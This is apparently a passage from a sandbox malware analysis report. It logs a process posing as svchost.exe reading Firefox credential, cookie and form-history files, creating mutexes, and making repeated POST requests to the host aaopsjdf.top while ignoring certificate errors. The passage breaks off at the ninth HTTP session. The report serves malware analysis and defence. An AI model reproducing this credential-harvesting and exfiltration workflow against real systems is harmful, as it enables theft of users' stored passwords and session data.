Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	2	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ	1	Fn

System (313)

Operation	Additional Information	Count	Logfile
Open Certificate Store	-	1	Fn
Get Computer Name	result_out = YKYD69Q	1	Fn
Sleep	duration = -1 (infinite)	2	Fn
Sleep	duration = -1 (infinite)	14	Fn
Sleep	duration = 600000 milliseconds (600.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:59:08 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:59:09 (UTC)	2	Fn
Get Time	type = Ticks, time = 176296	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:59:10 (UTC)	3	Fn
Get Time	type = System Time, time = 2018-01-10 18:59:11 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 19:01:21 (UTC)	4	Fn
Get Time	type = System Time, time = 2018-01-10 19:01:22 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 19:01:23 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 19:01:25 (UTC)	1	Fn
Get Info	type = Operating System	128	Fn
Get Info	type = Hardware Information	2	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	74	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	74	Fn
Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn

Mutex (23)

Operation	Additional Information	Count	Logfile
Create	mutex_name = E58EFF540968A436E982FCFA1C0445A2	1	Fn
Create	mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Create	mutex_name = 61AB4C4AE08220DC5911D67B8EFCF107	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Create	mutex_name = D3F6CAB61E96B029AD170EEF2C2F89C2	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Create	mutex_name = 61AB4C4AE08220DC5911D67B8EFCF107	1	Fn
Create	mutex_name = 61AB4C4AE08220DC5911D67B8EFCF107	2	Fn
Create	mutex_name = F063546A5853AF5508DB5A15751DB34A	3	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	3	Fn
Create	mutex_name = F063546A5853AF5508DB5A15751DB34A	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Release	mutex_name = 61AB4C4AE08220DC5911D67B8EFCF107	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Release	mutex_name = D3F6CAB61E96B029AD170EEF2C2F89C2	1	Fn

Ini (12)

Operation	Filename	Additional Information	Count	Logfile
Enumerate Sections	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini	data_out = General, size = 65000	4	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini	section_name = Profile0, key_name = Path, data_out = Profiles/3y2joh8o.default	4	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini	section_name = Profile0, key_name = IsRelative, default_value = 1	4	Fn

Network Behavior

HTTP Sessions (12)

Information	Value
Total Data Sent	8.22 KB (8421 bytes)
Total Data Received	986.50 KB (1010171 bytes)
Contacted Host Count	2
Contacted Hosts	www.google.com, aaopsjdf.top

HTTP Session #1

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	www.google.com
Server Port	443
Data Sent	0.33 KB (335 bytes)
Data Received	48.63 KB (49795 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = www.google.com, server_port = 443	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close , url = www.google.com/	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	12	Fn Data
Read Response	size = 4096, size_out = 639	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	8	Fn

HTTP Session #2

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.71 KB (728 bytes)
Data Received	0.19 KB (196 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close _ æ@, url = aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ	1	Fn
Send HTTP Request	headers = Connection: close _ æ@, url = aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 192	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	2	Fn

HTTP Session #3

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.71 KB (732 bytes)
Data Received	0.19 KB (196 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close a ü@, url = aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA	1	Fn
Send HTTP Request	headers = Connection: close a ü@, url = aaopsjdf.top/di/vm/8tO/N/d/VEPSK/z/Z3Z/w/Cm/EHA	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 192	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	2	Fn

HTTP Session #4

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.72 KB (742 bytes)
Data Received	0.19 KB (196 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close d°é@, url = aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg	1	Fn
Send HTTP Request	headers = Connection: close d°é@, url = aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 192	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	8	Fn

HTTP Session #5

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.73 KB (746 bytes)
Data Received	0.19 KB (196 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close t ¤A, url = aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ	1	Fn
Send HTTP Request	headers = Connection: close t ¤A, url = aaopsjdf.top/v6mlq8VpQl/rDA/k/P/cI/EIu/2_yI-/G/y/SyRTQ	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 192	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	2	Fn

HTTP Session #6

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.71 KB (728 bytes)
Data Received	0.09 KB (92 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close ÉÄ, url = aaopsjdf.top/9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA	1	Fn
Send HTTP Request	headers = Connection: close ÉÄ, url = aaopsjdf.top/9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 88	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	2	Fn

HTTP Session #7

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.72 KB (736 bytes)
Data Received	0.19 KB (196 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close ÐµA, url = aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/	1	Fn
Send HTTP Request	headers = Connection: close ÐµA, url = aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 192	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	8	Fn

HTTP Session #8

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.73 KB (744 bytes)
Data Received	0.19 KB (196 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close , url = aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/	1	Fn
Send HTTP Request	headers = Connection: close , url = aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 192	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	8	Fn

HTTP Session #9

Information	Value
